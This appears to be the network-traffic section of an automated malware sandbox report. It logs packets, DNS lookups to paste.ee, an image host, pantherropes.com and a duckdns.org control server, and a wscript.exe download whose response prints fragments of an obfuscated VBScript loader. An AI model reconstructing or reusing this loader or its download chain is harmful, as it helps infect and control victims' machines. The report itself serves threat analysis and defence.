Apr 23, 2024 07:53:29.388154984 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.388170958 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.388190031 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.388613939 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.388629913 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.388669014 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.388675928 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.388706923 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.389117956 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.389156103 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.389167070 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.389173031 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.389199972 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.389214039 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.389626026 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.389642000 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.389686108 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.389693975 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.389727116 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.390285015 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.390304089 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.390351057 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.390357971 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.390389919 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.390999079 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.391016960 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.391057968 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.391066074 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.391094923 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.391581059 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.391597986 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.391634941 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.391642094 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.391658068 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.391678095 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.392210960 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.392226934 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.392266989 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.392272949 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.392293930 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.392314911 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.392605066 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.392620087 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.392656088 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.392663956 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.392698050 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.393203020 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.393218994 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.393250942 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.393258095 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.393279076 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.393299103 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.393457890 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.393507004 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.393512011 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.393532038 CEST	443	49731	172.67.215.45	192.168.2.5
Apr 23, 2024 07:53:29.393569946 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:29.394257069 CEST	49731	443	192.168.2.5	172.67.215.45
Apr 23, 2024 07:53:34.161938906 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:34.161983967 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:34.162084103 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:34.162353992 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:34.162369967 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:34.855566025 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:34.855736971 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:34.859798908 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:34.859813929 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:34.860078096 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:34.861181974 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:34.908114910 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.534667969 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.534688950 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.534785986 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:35.534811020 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.582349062 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:35.875211954 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.875222921 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.875427008 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:35.875679016 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.875688076 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.875742912 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:35.876296997 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.876430988 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:35.918159962 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:35.918283939 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:36.221430063 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:36.221550941 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:36.221577883 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:36.221636057 CEST	443	49732	116.206.104.215	192.168.2.5
Apr 23, 2024 07:53:36.221667051 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:36.221916914 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:36.222042084 CEST	49732	443	192.168.2.5	116.206.104.215
Apr 23, 2024 07:53:46.036525011 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:53:46.207175016 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:53:46.207401037 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:53:46.325066090 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:53:46.548805952 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:53:50.064028025 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:53:50.206432104 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:53:58.364581108 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:53:58.579875946 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:10.395255089 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:10.610603094 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:20.048758030 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:20.222853899 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:22.429666996 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:22.642241001 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:34.461417913 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:34.673216105 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:46.807343960 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:47.032932043 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:50.048856020 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:50.254137993 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:56.846354961 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:57.057758093 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:57.057862043 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:57.267904997 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:57.268124104 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:57.486449957 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:57.486718893 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:57.697215080 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:54:58.748322010 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:54:58.970797062 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:00.851083994 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:01.064199924 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:01.064304113 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:01.284141064 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:01.284229040 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:01.501292944 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:01.660531044 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:01.892760038 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:07.139513969 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:07.349490881 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:09.368752956 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:09.580851078 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:09.580965996 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:09.798445940 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:09.798567057 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:10.017143011 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:10.823354959 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:11.048712015 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:11.166055918 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:11.376993895 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:11.377047062 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:11.588764906 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:11.593589067 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:11.814121962 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:15.615044117 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:15.830676079 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:17.817730904 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:18.032746077 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:20.064497948 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:20.129724979 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:22.054442883 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:22.267745972 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:22.454997063 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:22.673574924 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:22.673654079 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:22.891915083 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:22.892072916 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:23.110466957 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:26.760220051 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:26.970719099 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:27.973048925 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:28.189274073 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:28.773715973 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:28.984639883 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:31.477385998 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:31.689115047 CEST	8450	49735	134.255.217.251	192.168.2.5
Apr 23, 2024 07:55:38.794173002 CEST	49735	8450	192.168.2.5	134.255.217.251
Apr 23, 2024 07:55:39.017469883 CEST	8450	49735	134.255.217.251	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 07:53:22.989120960 CEST	58284	53	192.168.2.5	1.1.1.1
Apr 23, 2024 07:53:23.077950001 CEST	53	58284	1.1.1.1	192.168.2.5
Apr 23, 2024 07:53:26.746856928 CEST	50267	53	192.168.2.5	1.1.1.1
Apr 23, 2024 07:53:26.836596966 CEST	53	50267	1.1.1.1	192.168.2.5
Apr 23, 2024 07:53:33.624789000 CEST	52232	53	192.168.2.5	1.1.1.1
Apr 23, 2024 07:53:34.160691977 CEST	53	52232	1.1.1.1	192.168.2.5
Apr 23, 2024 07:53:36.650755882 CEST	49414	53	192.168.2.5	1.1.1.1
Apr 23, 2024 07:53:37.660680056 CEST	49414	53	192.168.2.5	1.1.1.1
Apr 23, 2024 07:53:38.690622091 CEST	49414	53	192.168.2.5	1.1.1.1
Apr 23, 2024 07:53:40.676469088 CEST	49414	53	192.168.2.5	1.1.1.1
Apr 23, 2024 07:53:40.742151022 CEST	53	49414	1.1.1.1	192.168.2.5
Apr 23, 2024 07:53:40.742167950 CEST	53	49414	1.1.1.1	192.168.2.5
Apr 23, 2024 07:53:40.742244005 CEST	53	49414	1.1.1.1	192.168.2.5
Apr 23, 2024 07:53:40.764601946 CEST	53	49414	1.1.1.1	192.168.2.5
Apr 23, 2024 07:53:45.429260969 CEST	59884	53	192.168.2.5	1.1.1.1
Apr 23, 2024 07:53:46.033052921 CEST	53	59884	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 23, 2024 07:53:22.989120960 CEST	192.168.2.5	1.1.1.1	0xa8a2	Standard query (0)	paste.ee	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:26.746856928 CEST	192.168.2.5	1.1.1.1	0x2f48	Standard query (0)	uploaddeimagens.com.br	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:33.624789000 CEST	192.168.2.5	1.1.1.1	0x8f06	Standard query (0)	pantherropes.com	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:36.650755882 CEST	192.168.2.5	1.1.1.1	0x6bf9	Standard query (0)	aprilxrwonew8450.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:37.660680056 CEST	192.168.2.5	1.1.1.1	0x6bf9	Standard query (0)	aprilxrwonew8450.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:38.690622091 CEST	192.168.2.5	1.1.1.1	0x6bf9	Standard query (0)	aprilxrwonew8450.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:40.676469088 CEST	192.168.2.5	1.1.1.1	0x6bf9	Standard query (0)	aprilxrwonew8450.duckdns.org	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:45.429260969 CEST	192.168.2.5	1.1.1.1	0xd79c	Standard query (0)	aprilxrwonew8450.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 23, 2024 07:53:23.077950001 CEST	1.1.1.1	192.168.2.5	0xa8a2	No error (0)	paste.ee		172.67.187.200	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:23.077950001 CEST	1.1.1.1	192.168.2.5	0xa8a2	No error (0)	paste.ee		104.21.84.67	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:26.836596966 CEST	1.1.1.1	192.168.2.5	0x2f48	No error (0)	uploaddeimagens.com.br		172.67.215.45	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:26.836596966 CEST	1.1.1.1	192.168.2.5	0x2f48	No error (0)	uploaddeimagens.com.br		104.21.45.138	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:34.160691977 CEST	1.1.1.1	192.168.2.5	0x8f06	No error (0)	pantherropes.com		116.206.104.215	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:40.742151022 CEST	1.1.1.1	192.168.2.5	0x6bf9	Server failure (2)	aprilxrwonew8450.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:40.742167950 CEST	1.1.1.1	192.168.2.5	0x6bf9	Server failure (2)	aprilxrwonew8450.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:40.742244005 CEST	1.1.1.1	192.168.2.5	0x6bf9	Server failure (2)	aprilxrwonew8450.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:40.764601946 CEST	1.1.1.1	192.168.2.5	0x6bf9	Server failure (2)	aprilxrwonew8450.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Apr 23, 2024 07:53:46.033052921 CEST	1.1.1.1	192.168.2.5	0xd79c	No error (0)	aprilxrwonew8450.duckdns.org		134.255.217.251	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.ee

uploaddeimagens.com.br

pantherropes.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49728	172.67.187.200	443	2624	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-23 05:53:23 UTC	319	OUT	GET /d/FIwXa HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: paste.ee Connection: Keep-Alive
2024-04-23 05:53:23 UTC	1232	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 05:53:23 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlqRCVX4nxswRKO1mqrRk907Ntj57zJeoVq7bdmitQv1gPsngtMUYlapNzmXD4PK%2B4GNFGV75TelHmazru6QRklEcErjXbImic1hLpxOG5TkE79%2FZJnugHJR6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 878b97c9af3f7d1e-EWR alt-svc: h3=":443"; ma=86400
2024-04-23 05:53:23 UTC	137	IN	Data Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 65 73 74 72 69 67 65 20 2c 20 63 61 6c 6f 6e 64 72 6f 20 2c 20 69 72 69 73 74 6f 6d 69 61 20 2c 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 2c 20 73 75 6d 65 6c 67 61 20 2c 20 43 61 6d 61 20 2c 20 73 75 6d 65 6c 67 61 31 0d 0a 20 20 20 20 20 63 61 6c 6f 6e 64 72 6f 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 69 72 69 73 74 6f 6d 69 61 20 20 3d 20 22 22 20 26 20 6d 61 Data Ascii: 1f7f dim estrige , calondro , iristomia , matozinhos , sumelga , Cama , sumelga1 calondro = " " iristomia = "" & ma
2024-04-23 05:53:23 UTC	1369	IN	Data Raw: 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 54 72 Data Ascii: tozinhos & calondro & matozinhos & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTr
2024-04-23 05:53:23 UTC	1369	IN	Data Raw: 48 51 44 67 54 72 65 4c 51 42 53 44 67 54 72 65 47 45 44 67 54 72 65 62 67 42 6b 44 67 54 72 65 47 38 44 67 54 72 65 62 51 44 67 54 72 65 67 44 67 54 72 65 43 30 44 67 54 72 65 51 77 42 76 44 67 54 72 65 48 55 44 67 54 72 65 62 67 42 30 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 4c 67 42 4d 44 67 54 72 65 47 55 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 6d 61 74 Data Ascii: HQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & matozinhos & calondro & matozinhos & "gBvDgTreHIDgTre" & mat
2024-04-23 05:53:23 UTC	1369	IN	Data Raw: 54 72 65 67 44 67 54 72 65 44 30 44 67 54 72 65 49 44 67 54 72 65 42 44 67 54 72 65 44 67 54 72 65 43 67 44 67 54 72 65 4a 77 42 6f 44 67 54 72 65 48 51 44 67 54 72 65 64 44 67 54 72 65 42 77 44 67 54 72 65 48 4d 44 67 54 72 65 4f 67 44 67 54 72 65 76 44 67 54 72 65 43 38 44 67 54 72 65 64 51 42 77 44 67 54 72 65 47 77 44 67 54 72 65 62 77 42 68 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 44 67 54 72 65 42 6c 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 75 44 67 54 72 65 Data Ascii: TregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTre" & matozinhos & calondro & matozinhos & "DgTreBlDgTreGkDgTrebQBhDgTreGcDgTre" & matozinhos & calondro & matozinhos & "QBuDgTre
2024-04-23 05:53:23 UTC	1369	IN	Data Raw: 44 67 54 72 65 48 44 67 54 72 65 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 77 44 67 54 72 65 2f 44 67 54 72 65 44 45 44 67 54 72 65 4e 77 44 67 54 72 65 78 44 67 54 72 65 44 4d 44 67 54 72 65 4d 77 44 67 54 72 65 35 44 67 54 72 65 44 51 44 67 54 72 65 4f 44 67 54 72 65 44 67 54 72 65 79 44 67 54 72 65 44 44 67 54 72 65 44 67 54 72 65 4a 77 44 67 54 72 65 70 44 67 54 72 65 44 73 44 67 54 72 65 49 44 67 54 72 65 44 67 54 72 65 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 51 42 68 44 67 54 72 65 47 63 44 67 54 72 65 22 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 63 61 6c 6f 6e 64 72 6f 20 26 20 6d 61 74 6f 7a 69 6e 68 6f 73 20 26 20 22 51 42 43 44 67 54 72 65 Data Ascii: DgTreHDgTreDgTre" & matozinhos & calondro & matozinhos & "wDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTre" & matozinhos & calondro & matozinhos & "QBCDgTre
